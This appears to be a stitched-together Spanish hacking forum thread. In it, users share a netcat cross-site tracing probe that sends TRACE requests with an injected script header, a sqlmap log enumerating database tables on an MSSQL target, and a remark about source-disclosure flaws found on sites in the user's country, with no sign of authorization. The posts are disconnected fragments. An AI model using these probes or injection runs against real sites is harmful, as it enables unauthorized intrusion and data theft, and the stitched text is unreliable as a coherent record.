Hola
Les cuento lo suguiente
he realizado bastantes escaneos con nikto (excelente herramienta)
la mayoria de las veces las paginas son vulnerables a XST
he leido como realizar este metodo HTTP, pero no se como ver si verdaderamente resulta
haci lo hago

$ nc -v www.ejemplo.com 80
Connection to www.ejemplo.com 80 port [tcp/www] succeeded!
OPTIONS / HTTP/1.O

...
Allow: GET,HEAD,POST,OPTIONS,TRACE
...

Bueno aca nos dice que la opcion TRACE esta habiilitada
ahora, en la pagina busco un search.php o algo haci

$ nc -v www.ejemplo.com 80
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>


...
...
...
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>

Ahora en la pagina noce que hacer para ver si verdaderamente resulto
el XST mediante TRACE.
Definición XST: http://en.wikipedia.org/wiki/Cross-site_tracing
SAludos
Gracias por las respuestas

Buenas
Tienes un buen blog, no sabia que era tuyo xd

Con respecto al tema los FSD los haces manual o ocupas algun programa ?
yo e descubierto varios FSD en paginas de mi pais , pero me quedo hay una pregunta ¿ como saber si la conexión del servidor Mysql o otra DB es local o remota.. ?
con respecto a este tema sabes podria leer o bajar algo.
Mucas gracias

Esta dificil me manda un error

[15:34:17] [INFO] retrieved: 14
[15:36:03] [INFO] performed 20 queries in 105 seconds
[15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC
[15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request

Avisa si lo has solucionado
Saludos

Tu pregunta sería como subir una imagen desde el panel de administrador
Saludos

Muy bueno =) saludos